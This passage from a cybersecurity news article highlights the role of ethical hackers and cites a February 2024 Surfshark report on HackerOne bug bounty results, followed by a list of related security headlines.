****Don’t Forget Ethical Hackers****

While Google’s TAG report focuses on the efforts of major technology companies in identifying security vulnerabilities, it’s important to acknowledge the vital role played by ethical hackers, also known as white hat hackers. These individuals contribute greatly to the cybersecurity community by legally working with organizations to discover flaws in their systems.

The impact of ethical hackers is further highlighted by a February 2024 Surfshark **report** analyzing HackerOne bug bounty program data. This report reveals that ethical hackers were able to identify a large number of vulnerabilities (835) across various websites (105). These valuable contributions not only helped to secure these platforms but also generated significant earnings (€417,000) for the hackers through **bug bounty programs**.

1.  Ivanti VPN Zero-Day Flaws Fuel Widespread Cyber Attacks
2.  Microsoft Office Most Exploited Software in Malware Attacks
3.  AI Flagged as “Chronic Risk” in UK Govt’s Risk Register Report
4.  Flashpoint Uncovers 100,000+ Hidden Flaws, Including 0-Days
5.  NIST Releases Cybersecurity Framework 2.0: Guide for All Orgs

Tag

#apple